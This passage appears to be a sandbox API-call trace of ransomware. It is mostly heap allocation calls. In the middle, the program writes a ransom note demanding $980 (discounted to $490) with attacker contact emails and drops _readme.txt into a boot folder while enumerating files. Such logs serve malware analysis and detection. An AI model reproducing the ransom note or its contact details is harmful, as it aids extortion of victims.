RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.510] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0228.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.510] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.510] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.510] PathFindFileNameW (pszPath="") returned="" [0228.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.510] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.510] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.511] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.511] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.511] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0228.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.511] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0228.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.512] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.512] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3467538 [0228.512] CreateFileW (lpFileName="C:\\Boot\\en-US\\_readme.txt" (normalized: "c:\\boot\\en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.513] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.513] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.514] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.514] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0228.514] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0228.514] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.514] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.516] HeapFree (in: hHeap=0x620000, 